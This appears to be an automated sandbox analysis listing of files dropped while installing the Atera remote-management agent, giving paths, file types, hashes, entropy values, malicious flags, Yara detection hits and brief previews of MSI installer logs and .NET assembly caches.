                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1499
                                                                                                                                                                                                                                        Entropy (8bit):5.341844552740347
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNWE4KXSE4KlOU4mXE4Ke60:MxHKQwYHKGSI6oPtHTHhAHKKkWHKCHKl
                                                                                                                                                                                                                                        MD5:D45F0B0387AA9450CC88125F2428C26D
                                                                                                                                                                                                                                        SHA1:8C77259A299BF2FB7A66EC695A3F0EFA5154DCB6
                                                                                                                                                                                                                                        SHA-256:6A6DF19288C76B1CEDD0F507F226705CDE6A69F3AB59B4FC13AF5C7B7F7D12A3
                                                                                                                                                                                                                                        SHA-512:5523AD8087ECE039FFFEF746F9B6175D6C2F2523C372FC813D21E695C18D986432D2B83C23D0E6CD6C42C97DFC8DECE3121BE8907D05337EA9B282D3E947EF4F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\ce
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1075
                                                                                                                                                                                                                                        Entropy (8bit):5.353521172341231
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNa8mE4Dp689:MxHKQwYHKGSI6oPtHTHhAHKKka8mHDpN
                                                                                                                                                                                                                                        MD5:BDADAD127D5A6079C29C0C870A5C3C2C
                                                                                                                                                                                                                                        SHA1:AD5D30886AE959F271CF777D386A31CD792C9A64
                                                                                                                                                                                                                                        SHA-256:7186B9EAC66BD83E5E1C050D81529BC68511538118E65019EBECFD952C22FD55
                                                                                                                                                                                                                                        SHA-512:198087F52C39A32ACE7A90E9212C2AA0F31EDF8349773C8C6C5495CA82C890F9A8A44356AC5AEBB42F3342E6BE981DC4BCFE1D7FB43760745D7240A117257725
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv7
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (319), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):225846
                                                                                                                                                                                                                                        Entropy (8bit):3.782508927088187
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:M0HGXlyhzyz3W7AO9ilbqe2QKpJViYAQ+gaWb/vcqcy5NNndwLjoiIgQtJrCpy+S:MWRjqpJgUtj3JMlRviW5TsPa
                                                                                                                                                                                                                                        MD5:44F40D5BA8BCC7FA0A16F53F2423177A
                                                                                                                                                                                                                                        SHA1:3D48B3237DAE6748ED1B497ECD785CC37CF907FD
                                                                                                                                                                                                                                        SHA-256:A5FB4DBB44FB8E6525965630A711B563E7FD19A7EB6E4ACF05DDEDCDEB844ABE
                                                                                                                                                                                                                                        SHA-512:EDBD7FB02686CCE7FEE19AB8A45FB9F1DA3094DBCC030ABC94BDFDCB78E391442F31AD49FEC34A9EC889EF51E74D2469249180A8F1F58F7AD32400196D0EE16B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\AteraSetupLog.txt, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
Preview:
=== Verbose logging started: 02/10/2024  11:20:27  Build type: SHIP UNICODE 5.00.10011.00  Calling process: C:\Windows\SYSTEM32\msiexec.exe ===
MSI (c) (BC:C4) [11:20:28:034]: Resetting cached policy values
MSI (c) (BC:C4) [11:20:28:034]: Machine policy value 'Debug' is 0
MSI (c) (BC:C4) [11:20:28:034]: ******* RunEngine:
           ******* Product: C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi
           ******* Action: 
           ******* CommandLine: **********
MSI (c) (BC:C4) [11:20:
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (319), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):551094
                                                                                                                                                                                                                                        Entropy (8bit):3.8429895879270437
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Yc7OjjATNY+2swuiWgnmsaq/DWU3m/GmkS7hRxctjeqcrS4D2x6ge71nv+lmxRj9:4jCQe
                                                                                                                                                                                                                                        MD5:CE1CBD018661CD077BC2423AED1724F2
                                                                                                                                                                                                                                        SHA1:9C5214EF70C5CD795DBBC505F2A5DFB46711B559
                                                                                                                                                                                                                                        SHA-256:24EDFE2B5D679D0C2190A0FCB7D5E3FBBCECDF714DCC931C02A4E1B439BADFB9
                                                                                                                                                                                                                                        SHA-512:E2AF7C2E6A7962D3789530FCC1768875978F49D9C4997404669255C7BC554CD781EF313175D8ED0CF6A9EC26D3473CA8BDB6592CF4BC77499D9A42B52CC7CEFB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.32_(x64)_20241002112056_000_dotnet_runtime_6.0.32_win_x64.msi.log, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
Preview:
=== Verbose logging started: 02/10/2024  11:20:57  Build type: SHIP UNICODE 5.00.10011.00  Calling process: C:\Windows\Temp\{689FE188-3B8D-40FA-B1EC-A4813EAA1C0A}\.be\dotnet-runtime-6.0.32-win-x64.exe ===
MSI (c) (64:C0) [11:20:57:514]: Resetting cached policy values
MSI (c) (64:C0) [11:20:57:514]: Machine policy value 'Debug' is 0
MSI (c) (64:C0) [11:20:57:514]: ******* RunEngine:
           ******* Product: C:\ProgramData\Package Cache\{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}v48.128.16743\d
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (400), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):99398
                                                                                                                                                                                                                                        Entropy (8bit):3.7943895672244654
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:gLz5/cBc8Z3NjE98rwtIPDwBKJNVS4Qw+mYe3W9DE4Y4Saej/Pwz0A3b:gOzj/Pwz06b
                                                                                                                                                                                                                                        MD5:113C2BAA802976E12ABC1D5DD6A7FB88
                                                                                                                                                                                                                                        SHA1:591FDA42B1259922BA52D1276650E42F8FA0AD7B
                                                                                                                                                                                                                                        SHA-256:DD1D1DD7B69AEC10B4AB68B9ED5EB3526114E5CFC310B938ACAAE3B2E640DE21
                                                                                                                                                                                                                                        SHA-512:98D36BA883BA6F1C006798C2A1DA034269DF16399CE234CCD2DE733D1AA59A40AEBB893F26B10AD893E97CEC6B723BCCEA7101D843FA6D14A7CAF3074B8D3534
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.32_(x64)_20241002112056_001_dotnet_hostfxr_6.0.32_win_x64.msi.log, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
Preview:
=== Verbose logging started: 02/10/2024  11:21:14  Build type: SHIP UNICODE 5.00.10011.00  Calling process: C:\Windows\Temp\{689FE188-3B8D-40FA-B1EC-A4813EAA1C0A}\.be\dotnet-runtime-6.0.32-win-x64.exe ===
MSI (c) (64:80) [11:21:14:451]: Resetting cached policy values
MSI (c) (64:80) [11:21:14:451]: Machine policy value 'Debug' is 0
MSI (c) (64:80) [11:21:14:451]: ******* RunEngine:
           ******* Product: C:\ProgramData\Package Cache\{667CB653-70E1-4E2B-9C8E-6A02A6CF88B9}v48.128.16743\d
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (385), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):109720
                                                                                                                                                                                                                                        Entropy (8bit):3.799876434012075
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:eOS8PodwQl7AX09ebwfmHjbZrJ6QDdlt3sT+AgoMX3NLVjqV3BqsRi9Tmi9+F:e1KjqV3BqsRi9TmiMF
                                                                                                                                                                                                                                        MD5:FB60A7A18A3399C448B3EB13A2112D42
                                                                                                                                                                                                                                        SHA1:73F0F493A5F0434AF830D6A39F8E185307D9DACF
                                                                                                                                                                                                                                        SHA-256:A1DD67A7E045591E2CC2C3B143BF9EC38BBFBA7C842508EE991A8CF926FF7FFC
                                                                                                                                                                                                                                        SHA-512:B9F73FF4648E70E3217EE0E51CAA63D765BF520836E436C01E9FB97EE8E1504820E8E88C9DFB05EC6CB68542151FAC498F6ABD67EEA1960412471347A2FFBEFA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.32_(x64)_20241002112056_002_dotnet_host_6.0.32_win_x64.msi.log, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
Preview:=== Verbose logging started: 02/10/2024  11:21:16  Build type: SHIP UNICODE 5.00.10011.00  Calling process: C:\Windows\Temp\{689FE188-3B8D-40FA-B1EC-A4813EAA1C0A}\.be\dotnet-runtime-6.0.32-win-x64.exe ===..MSI (c) (64:04) [11:21:16:342]: Resetting cached policy values..MSI (c) (64:04) [11:21:16:342]: Machine policy value 'Debug' is 0..MSI (c) (64:04) [11:21:16:342]: ******* RunEngine:..           ******* Product: C:\ProgramData\Package Cache\{A09F8381-88C3-44C4-9DAB-AC44F4F4DB4B}v48.128.16743\d
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4332
                                                                                                                                                                                                                                        Entropy (8bit):3.6770194492770263
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:Yh+DK8O5XnoKfLtJKG81c1B1c1NfrPeSDqeS2tJxx9a5XA:UUO5MX0T0h2SD9Sira6
                                                                                                                                                                                                                                        MD5:ED08B5DF69596916407BF90E45B6C403
                                                                                                                                                                                                                                        SHA1:ED5EA4A7594BAA6FED1EDA971EB4EF5A51B54CC7
                                                                                                                                                                                                                                        SHA-256:5DAAA691F1EAD883D90A5A0F842BE5B41AC727037ED706734CDFFD7246F6FAF3
                                                                                                                                                                                                                                        SHA-512:B589E51A54D6FBF50CD8BF9FE035CA815883F327331AC5CE51D30B3CD9D94427715203E84098DDC90FBE371DC2DA981ADB910C14CD27228829DEBEF3D23FA78B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
Preview:=== Verbose logging started: 02/10/2024  11:20:37  Build type: SHIP UNICODE 5.00.10011.00  Calling process: C:\Windows\SysWOW64\msiexec.exe ===..MSI (c) (64:78) [11:20:37:639]: Resetting cached policy values..MSI (c) (64:78) [11:20:37:639]: Machine policy value 'Debug' is 0..MSI (c) (64:78) [11:20:37:639]: ******* RunEngine:..           ******* Product: setup.msi..           ******* Action: ..           ******* CommandLine: **********..MSI (c) (64:78) [11:20:37:639]: Client-side and UI is none
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):56378536
                                                                                                                                                                                                                                        Entropy (8bit):7.946478796737553
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:786432:eB4DOC/YOGmsS/FcbNbDm87ViwLTCg2m+5iYeVhV4ASHQy6UUZwNSG3bZxE5:jDO0GVUINbD5gwLz2mu2/3YZh3bZS5
                                                                                                                                                                                                                                        MD5:F1356F7FBD37502B529D9BCD643FB7AB
                                                                                                                                                                                                                                        SHA1:35FA2B2BBA3F4E04D078F8B77C5495757144FBDD
                                                                                                                                                                                                                                        SHA-256:C33D039DF86870B7EE728C60B7755E6693596AD6EA9ADD4381F01A42C52877E3
                                                                                                                                                                                                                                        SHA-512:09A50B84F24354DCF35E01E4C7C0081A2C34A7D12957DAF7608A20A5B3EFCEEA63772AEEE4D095A7FD79BFFEC8AB84398048E7BE96CBEA9CC3BA8F2A824316EF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: x64;1033, Revision Number: {911E9E2F-B38D-4D02-A148-5E49FC9D8943}, Create Time/Date: Wed Feb 28 10:52:04 2024, Last Saved Time/Date: Wed Feb 28 10:52:04 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2994176
                                                                                                                                                                                                                                        Entropy (8bit):7.878630966889847
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:s+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oq1xMbY+K/tzQz:s+lUlz9FKbsodq0YaH7Z1xMb8tT
                                                                                                                                                                                                                                        MD5:5E90226ABB5A004B0B9DB9A9E67BAC21
                                                                                                                                                                                                                                        SHA1:34EB703055BAFA469A714F18C7F00E5098B764AF
                                                                                                                                                                                                                                        SHA-256:BE0C53481ED4CF3EC4D0AD16053CD18D6AAD8C349B8281F5F9B90B526420CEAE
                                                                                                                                                                                                                                        SHA-512:2676357D10AA76F09F2A1F691C7566D54E34B20716EDF1301B2D69C3E3400D0A70E7C1738AEA9A75334B384AB988CEA3A07B983C900AE32395285BE61673C288
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.6045756871847139
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:C8Ph4uRc06WXzAFT5qd/8BctSjndd4d/EqdGUDjzbQSSsndd4dXE8:th411FT0/8Bc93DfNg
                                                                                                                                                                                                                                        MD5:DDB86F5B58A205F2D26E2ECDB06069CD
                                                                                                                                                                                                                                        SHA1:AB425904331722C227225F6ACDC23FD657B01F90
                                                                                                                                                                                                                                        SHA-256:B75A8CDEFF4B90500AB54993394B554694F48468B25F78F895AB710649C966BE
                                                                                                                                                                                                                                        SHA-512:17E4B940DCC23C9CC616A0259C7E50726ED126564A55CDB26F188F37013F4DE85885E3E5E914B15E9B1CFC8C3C574607D99E47AD58D3D1989D6A94770FF04EB2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF0B294D66713B8AC8.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.5814558018431928
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:W8PhmuRc06WX4wnT556SVRfqISoedGPdGfMKrQP/StedGPdGRubkZn:phm1AnTf62SIBvHoYZ
                                                                                                                                                                                                                                        MD5:A46F9A7AF8750EB4C350A1ADD299E2D2
                                                                                                                                                                                                                                        SHA1:EF225989A2D053A399C97A17F290C948C73F4659
                                                                                                                                                                                                                                        SHA-256:E9268BAA413D01BE9227509E0699E46726EE3FEEC07AF22802EBE2C98AB43C5D
                                                                                                                                                                                                                                        SHA-512:9FBDF5EF569DCCFD48AC84DA5C91936149D547A40A7D404846AF2E54571421EA64B1AD6805FD5E1C6DAF98BCA45014064278D44A4685CA2D6EE98B584E11CBE0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF1180A11919FC8284.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.08390542666500003
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOC+Yoe7CGuNQ/am2oIlt4Vky6lwt/:2F0i8n0itFzDHF6oe7tuYaBoITw1
                                                                                                                                                                                                                                        MD5:967B21478EDAA6E01AEDBD156BF5AC8E
                                                                                                                                                                                                                                        SHA1:0F6092531F2B32F89BC65AB90F355A787BF54756
                                                                                                                                                                                                                                        SHA-256:9BA0E7A77DA3B151A8CC31CE5AD00B1DFD17C5231780165D60CDD723235D7D4A
                                                                                                                                                                                                                                        SHA-512:4164850335D70EBA5EA7768851ECC15D804A8753EB92CA161C4296A592C126732B48774B488AFC4A7753777FD95B9321A155F1B9B87A93CE7F7D7FFF431880EB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.620433948434433
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:4D8PhPuRc06WXJEnT53DeqISoedvPdvbCnuhnq9FnCdStedvPdvxubS:4qhP1HnTpD7IciuBulU4
                                                                                                                                                                                                                                        MD5:DC61A0CDBF3DD456206101D76350E716
                                                                                                                                                                                                                                        SHA1:AD3416020998E9135D0A4A45D4F483B3C805D880
                                                                                                                                                                                                                                        SHA-256:63CF342EBFAE1EF9C46D60E0719A0E42B82E06E77EF89D011E07229AFE78CFB5
                                                                                                                                                                                                                                        SHA-512:B2F8C8055E6491B61E08ED5DE897E711CFA763F2843FBBBFDC3E3668D4E34E39A8A91D486A9B6D1C3F6603788F1CF759396E9D27E09B9D7A147B56FEB6704B3E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF25FF7DC86312E06B.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2804974923941066
                                                                                                                                                                                                                                        Encrypted:false
